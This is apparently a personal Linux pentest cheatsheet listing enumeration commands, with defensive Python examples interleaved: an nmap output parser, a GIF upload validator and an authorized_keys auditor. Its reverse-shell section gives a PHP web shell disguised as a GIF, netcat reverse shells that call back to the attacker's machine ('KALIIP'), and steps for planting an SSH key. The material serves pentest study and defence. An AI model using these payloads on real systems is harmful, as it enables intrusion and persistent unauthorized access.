WIP – Linux pentest cheatsheet

Intended for personal use. I use many websites and pages from my blog; I just want to have all those things in one cozy page.

Enumeration

Port

nmap

Simple, quick and dirty scan with OS and version detection:

nmap -A -O -v -T4 X.X.X.X

A more complete one:

nmap -sV -sC -oA tcpnmap X.X.X.X

Custom one to check whether there are some unusual ports open:

nmap -A -O -v -T4 --top-ports 5000 -oA tcptop5000nmap X.X.X.X

UDP:

nmap -sU -oA udpnmap X.X.X.X

P.S. -p- to scan all ports (take a break and go make a sandwich)
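The -oA option used above writes three files, including a greppable .gnmap file. The parser below, added here as an example (it is not part of the original cheatsheet and the scan text is constructed, using the 192.0.2.0/24 documentation range), turns that file into records so results can be reviewed or diffed between scans instead of read by eye:

```python
"""Parse the greppable (.gnmap) file written alongside `nmap -oA <basename>`.

Added example, not part of the original cheatsheet. The scan text below is
constructed by hand (documentation range 192.0.2.0/24), not real scan output.
"""
import re
from typing import Dict, List

# Constructed sample .gnmap content. nmap writes "Host:" lines with tab-separated
# fields; inside "Ports:" each entry is
# port/state/protocol/owner/service/rpc-info/version/ (slashes inside the
# version string are escaped by nmap as '|').
SAMPLE_GNMAP = (
    "# Nmap 7.93 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sV -sC -oA tcpnmap 192.0.2.10\n"
    "Host: 192.0.2.10 ()\tStatus: Up\n"
    "Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.52 ((Ubuntu))/, 443/closed/tcp//https///\tIgnored State: filtered (997)\n"
    "# Nmap done at Mon Jan  1 10:01:30 2024 -- 1 IP address (1 host up) scanned in 90.12 seconds\n"
)

_HOST_RE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)")
# Port entries are separated by ", " but a version string may itself contain a
# comma, so only split where the next entry's "<port>/" follows.
_ENTRY_SPLIT = re.compile(r",\s+(?=\d+/)")


def parse_gnmap(text: str) -> List[Dict[str, str]]:
    """Return one record per port entry found in the greppable output."""
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment / summary lines
        fields = line.split("\t")
        host = _HOST_RE.match(fields[0])
        ports_field = next((f for f in fields[1:] if f.startswith("Ports:")), None)
        if host is None or ports_field is None:
            continue  # "Status: Up" lines carry no port data
        for entry in _ENTRY_SPLIT.split(ports_field[len("Ports:"):].strip()):
            parts = entry.split("/")
            if len(parts) < 7:
                continue  # malformed entry: skip rather than crash on odd output
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            records.append({
                "host": host.group("ip"),
                "hostname": host.group("name"),
                "port": port,
                "proto": proto,
                "state": state,
                "service": service,
                "version": version.replace("|", "/"),
            })
    return records


def open_ports(text: str) -> List[Dict[str, str]]:
    """Only the entries nmap reported as open."""
    return [r for r in parse_gnmap(text) if r["state"] == "open"]


def summary(text: str) -> Dict[str, List[str]]:
    """host -> ["22/tcp ssh OpenSSH ...", ...], handy for diffing two scans of the same host."""
    out: Dict[str, List[str]] = {}
    for r in open_ports(text):
        out.setdefault(r["host"], []).append(
            f"{r['port']}/{r['proto']} {r['service']} {r['version']}".rstrip()
        )
    return out


if __name__ == "__main__":
    for host, services in summary(SAMPLE_GNMAP).items():
        print(host)
        for s in services:
            print("  ", s)
```

Feed it the contents of tcpnmap.gnmap (or udpnmap.gnmap) from the commands above; keeping the summaries from successive scans makes it easy to spot a port that appeared or changed version between two runs.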

Webservice

Nikto

nikto -h X.X.X.X

Uniscan

uniscan -u http://X.X.X.X/ -qweds

Dirbuster

Start the GUI:

dirbuster

Most used list:

/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Dirb

dirb http://X.X.X.X /usr/share/dirb/wordlists/common.txt

(also big.txt is interesting)

Dirsearch

git clone http://github.com/maurosoria/dirsearch
python3 dirsearch.py -u http://X.X.X.X -e php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f -t 20

-f force extensions
-r recursive (if needed)

Wpscan

wpscan --url http://X.X.X.X/wordpress --enumerate u vp vt

droopescan

Up-to-date Drupal scanner

droopescan scan drupal -u X.X.X.X

Burp

Enum4linux

For extensive enumeration with enum4linux:

enum4linux -a -o -n -v X.X.X.X

DNS

NSLOOKUP

nslookup
>SERVER X.X.X.X
>127.0.0.1
Server: ...
Address: ...
>X.X.X.X
Server: ...
Address: ...
>box.com
Server: ...
Address: ...

Name: box.com
Address:X.X.X.X

dnsrecon

Reverse lookup brute force:

dnsrecon -r 127.0.0.0/24 -n X.X.X.X
dnsrecon -r 127.0.1.0/24 -n X.X.X.X
dnsrecon -r X.X.X.0/24 -n X.X.X.X

dns zone transfer

Zone transfer:

dig axfr @X.X.X.X

We can get a few extra subdomains / zone records:

dig axfr box.com @X.X.X.X

Add a DNS server

edit:

/etc/resolv.conf
nameserver X.X.X.X

Reverse Shell

To test

GIF to upload as a test:

GIF8 <?php echo system($_REQUEST['command']); ?>
xxxx.gif?command=id

If it works:

xxxx.gif?command=nc -e /bin/sh KALIIP 8081
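The trick above works because the upload check only looks at the first bytes ("GIF8") and the web server then executes the file. The check below is an added example, not code from the original cheatsheet: it walks the whole GIF block structure instead of trusting the magic bytes, refuses anything after the trailer, and scans for script markers. TINY_GIF is a hand-built 1x1 transparent GIF and the payload strings are constructed for the test.

```python
"""Server-side check for an uploaded "image" that is really a PHP web shell.

Added example, not part of the original cheatsheet. TINY_GIF is a hand-built
1x1 transparent GIF and the payload strings are constructed for the test.
"""
from typing import Tuple

# A valid 43-byte 1x1 transparent GIF89a (constructed): header, logical screen
# descriptor, 2-entry colour table, graphic control extension, image descriptor,
# LZW data and the 0x3B trailer.
TINY_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00"
    b"\x00\x00\x00\xff\xff\xff"
    b"\x21\xf9\x04\x01\x00\x00\x00\x00"
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    b"\x02\x02\x44\x01\x00\x3b"
)

# The upload trick from the cheatsheet: a fake "GIF8" prefix in front of PHP.
PAGE_STYLE_PAYLOAD = b"GIF8 <?php echo system($_REQUEST['command']); ?>"

SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Advance over GIF data sub-blocks (length byte + payload) up to the 0x00 terminator."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block")
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size


def walk_gif(data: bytes) -> bool:
    """Walk the GIF block structure end to end.

    Returns True only if every block is well formed and the 0x3B trailer is the
    final byte; a magic-bytes check alone would accept "GIF8 <?php ...".
    """
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("bad signature")
    if len(data) < 13:
        raise ValueError("truncated logical screen descriptor")
    packed = data[10]
    pos = 13
    if packed & 0x80:  # global colour table present: 2^(n+1) entries of 3 bytes
        pos += 3 * (2 << (packed & 0x07))
    while True:
        if pos >= len(data):
            raise ValueError("missing trailer")
        block = data[pos]
        pos += 1
        if block == 0x3B:
            if pos != len(data):
                raise ValueError("data after trailer")
            return True
        if block == 0x21:  # extension: label byte, then sub-blocks
            pos += 1
            pos = _skip_sub_blocks(data, pos)
        elif block == 0x2C:  # image descriptor: 9 bytes, optional local colour table, LZW data
            if pos + 9 > len(data):
                raise ValueError("truncated image descriptor")
            local_packed = data[pos + 8]
            pos += 9
            if local_packed & 0x80:
                pos += 3 * (2 << (local_packed & 0x07))
            pos += 1  # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
        else:
            raise ValueError(f"unexpected block 0x{block:02x}")


def validate_gif_upload(data: bytes) -> Tuple[bool, str]:
    """Accept only structurally valid GIFs that carry no script markers."""
    try:
        walk_gif(data)
    except (ValueError, IndexError) as exc:
        return False, f"rejected: malformed GIF ({exc})"
    lowered = data.lower()
    for marker in SCRIPT_MARKERS:
        if marker in lowered:
            return False, "rejected: script marker inside image bytes"
    return True, "ok"
```

Even a file that passes should be stored under a server-chosen name in a directory the web server never executes scripts from, and served with an image content type; the ?command= step only works when the server is willing to run the uploaded file.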

netcat

TCP

On the Kali box: nc -lvnp 8081

nc -e /bin/sh KALIIP 8081

UDP

(need to check -e -u)
On the Kali box: nc -u -lvnp 8081

nc -u -e /bin/sh KALIIP 8081

To get a full TTY shell:

python -c 'import pty;pty.spawn("/bin/bash");'

Background with CTRL+Z

stty raw -echo
fg [enter]

(sometimes you also need to run the command bash afterwards)

Create SSH key pair

ssh-keygen
PATH: /root/ssh_key

and the generated public key needs to be added on the server to:

/home/user/.ssh/authorized_keys

To connect:

ssh -i ssh_key user@X.X.X.X
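A key dropped into authorized_keys is also the first thing to look for when reviewing a box, so here is the defender-side counterpart as an added example (not code from the original cheatsheet): parse the file, compute the same SHA256 fingerprint that ssh-keygen -lf prints, and report every key that is malformed or not on an approved list. The key material is constructed (all-zero and all-one 32-byte values), not real Ed25519 keys.

```python
"""Audit an authorized_keys file against an approved-key list.

Added example, not part of the original cheatsheet. The key material is
constructed (all-zero / all-one 32-byte values), not real Ed25519 keys.
"""
import base64
import hashlib
import re
import struct
from typing import Dict, List

# An authorized_keys line is: [options] keytype base64-blob [comment].
_KEY_RE = re.compile(
    r"(?:^|\s)(?P<type>ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521))"
    r"\s+(?P<blob>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$"
)


def _wire_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length prefix + bytes."""
    return struct.pack(">I", len(b)) + b


def make_ed25519_blob(pubkey32: bytes) -> str:
    """Base64 OpenSSH public-key blob for a raw 32-byte Ed25519 key (used to build samples)."""
    return base64.b64encode(_wire_string(b"ssh-ed25519") + _wire_string(pubkey32)).decode()


def fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint in the form `ssh-keygen -lf` prints (base64, no padding)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[dict]:
    """One dict per non-comment line; 'error' is set when the line is not a usable key."""
    keys: List[dict] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = _KEY_RE.search(stripped)
        if m is None:
            keys.append({"line": lineno, "type": None, "blob": None, "options": None,
                         "comment": None, "error": "unparseable line"})
            continue
        # The blob starts with the key type again; a mismatch means the line
        # was hand-edited or corrupted.
        wire_type = None
        try:
            raw = base64.b64decode(m.group("blob"), validate=True)
            (n,) = struct.unpack(">I", raw[:4])
            wire_type = raw[4:4 + n].decode("ascii")
        except (ValueError, struct.error, UnicodeDecodeError):
            pass
        keys.append({
            "line": lineno,
            "type": m.group("type"),
            "blob": m.group("blob"),
            "options": stripped[:m.start()].strip() or None,
            "comment": m.group("comment"),
            "error": None if wire_type == m.group("type") else "blob type mismatch",
        })
    return keys


def audit(text: str, approved: Dict[str, str]) -> List[str]:
    """One finding per key that is malformed or whose fingerprint is not in
    `approved` (fingerprint -> owner)."""
    findings: List[str] = []
    for k in parse_authorized_keys(text):
        if k["error"]:
            findings.append(f"line {k['line']}: {k['error']}")
            continue
        fp = fingerprint(k["blob"])
        if fp not in approved:
            who = k["comment"] or "no comment"
            opts = f" [options: {k['options']}]" if k["options"] else ""
            findings.append(f"line {k['line']}: unapproved key {fp} ({who}){opts}")
    return findings


# Constructed sample: one approved key and one that nobody registered.
APPROVED_BLOB = make_ed25519_blob(bytes(32))
UNKNOWN_BLOB = make_ed25519_blob(bytes([1]) * 32)
APPROVED_KEYS = {fingerprint(APPROVED_BLOB): "alice"}
SAMPLE_AUTHORIZED_KEYS = (
    "# constructed sample file\n"
    f"ssh-ed25519 {APPROVED_BLOB} alice@laptop\n"
    f'command="/usr/bin/rrsync /srv/backup",no-pty ssh-ed25519 {UNKNOWN_BLOB} backup@unknown-host\n'
)

if __name__ == "__main__":
    for finding in audit(SAMPLE_AUTHORIZED_KEYS, APPROVED_KEYS):
        print(finding)
```

Run it over /root/.ssh/authorized_keys and every /home/*/.ssh/authorized_keys on a schedule; the fingerprints it prints are the same ones ssh-keygen -lf shows, so the approved list can be built from the keys people actually registered.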

Useful links:

Reverse Shell Cheat Sheet

Privilege Escalation

LinEnum.sh

linuxprivchecker.py

unixprivesc.sh

sudo info

To see which commands the user can run with sudo:

sudo -l

To see the version of sudo:

dpkg -l sudo

Grab the exploit directly from searchsploit:

searchsploit -x <path shown in the searchsploit results>
